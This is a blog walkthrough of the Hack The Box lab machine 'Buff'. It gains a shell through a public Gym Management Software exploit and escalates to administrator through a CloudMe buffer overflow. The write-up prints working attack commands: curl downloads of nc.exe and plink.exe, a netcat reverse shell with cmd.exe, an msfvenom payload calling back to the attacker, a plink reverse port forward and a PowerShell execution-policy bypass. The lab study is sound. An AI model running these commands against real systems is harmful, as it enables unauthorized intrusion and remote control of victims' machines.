CloudMe 1.11.2 Exploitation. Hackthebox Buff Walkthrough.

HTB/Buff was a fun box based on CloudMe 1.11.2 BufferOverflow Exploitation. Let’s dive deeper into how we can exploit this amazing box.

Scanning

Run a Nmap scan against the box.

nmap -A -T4 -p- -v 10.10.10.198

The scan shows port 8080 as open, running Apache HTTP Web Server. For further enumeration, we visit the webpage at 10.10.10.198:8080

On enumerating our website we found that the website has been made using Gym Management Software 1.0.

We found an exploit on exploit-db for the software.

https://www.exploit-db.com/exploits/48506

Exploitation:

The exploit is based on python2. Download the exploit and run as python2 48506.py http://10.10.10.198:8080/. On successful execution, you will be rewarded with a semi-interactive shell.

Download nc.exe and plink.exe executables from the web.

In your attacker machine, host a python server in the directory containing nc.exe and plink.exe

In Your semi-interactive shell download nc.exe and plink.exe using curl.

curl http://YourTunnelIp:portnumber/nc.exe -o nc.execurl http://YourTunnelIp:portnumber/plink.exe -o plink.exe

Now it’s time to gain a more interactive User level shell.

Open a netcat listener on your attacker machine.

nc -nvlp 5555

In your semi-interactive shell run nc.exe.

nc.exe YourTunIp 5555 -e cmd.exe

You will successfully gain a shell. Navigate to C:\Users\shaun\Desktop to see the user.txt file.

Post Exploitation Enumeration:

Terminate the connection in the semi-interactive shell and run the exploit again.

Upload winpeas.exe in a similar way using curl.

In Your netcat shell run powershell.

powershell -ep bypass

Run Winpeas

.\winpeas.exe

Winpeas Output shows that the box is running CloudMe 1.1.2 which might be vulnerable.

Google CloudMe 1.1.2 exploit and you’ll find a Buffer Overflow exploit at exploitdb.

Download the exploit and paste it into the working folder.

Now we need to generate a payload for the exploit

Generate a payload using msfvenom

Open a terminal and type the following command to generate the payload. Don’t forget to add your Tunnel Ip address..!!!!

msfvenom -p windows/exec CMD=’c:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe YourTunnelIp 9897' -b ‘\x00\x0a\x0d\’ -f py -v payload

Copy the generated payload and paste into your exploit, replacing the existing lines containing the payload.

Now, all we need to do is trigger a Buffer Overflow using the payload.

Privilege Escalation:

In our netcat shell we will run plink.exe to create a remote port forward to our attacker machine via ssh.

plink.exe -v -x -a -T -C -noagent -ssh -pw ‘YourSSHPassword’ -R 8888:127.0.0.1:8888 sshusername@YourTunnelIp

If authentication fails type your password again.

If you are not able to get a TTY shell use the following command to generate one.

python -c 'import pty; pty.spawn("/bin/bash")'

We have now successfully created a remote port forward to our attacker machine through SSH.

Navigate to the directory containing your Buffer Overflow payload.

Create a Netcat listener on the same port you mentioned while creating exploit using msfvenom.

nc -nvlp port

Once you have spawned a listener run the payload using Python3

python3 payload.py

You will have successfully gained an administrator-level shell.

For the root.txt navigate to C:\Users\Administrator\Desktop

We have successfully compromised the box with Administrator privileges. The box was fun. Gaining user privileges was easy but you might have to try few times for root access. Don’t give Up. Try Harder.

Bonus Tip: Check the running ports with ```netstat -ano``` command. Do not run the Buffer Overflow exploit until port 8888 shows up.

For any queries/suggestions follow me on Twitter @deltsandtraps.

THANK YOU.

--

--

--

Web Developer | Security Researcher | OSCP | Noob

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Backing Hats — a decentralized cybersecurity network

{UPDATE} Extremo lujo desierto Safari conducir - conducir 4 Hack Free Resources Generator

Virus Hunting without AntiVirus from PC

What is ModSecurity?

{UPDATE} Fire Dept 80 Hack Free Resources Generator

Do You Want or Do You Need Windows 11?

Data Ethics: Legal and Regulatory Aspects of Data Ethics

Enmaku (6/6) Privacy Tips & Final Notes

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Abhishek Rautela

Abhishek Rautela

Web Developer | Security Researcher | OSCP | Noob

More from Medium

Shocker HTB Writeup

Intigriti -1337up CTF — Warmup Encoder writeup

Throwback — Part 5 — Domain Enumeration & Kerberoast

ToolsRus CTF — Writeup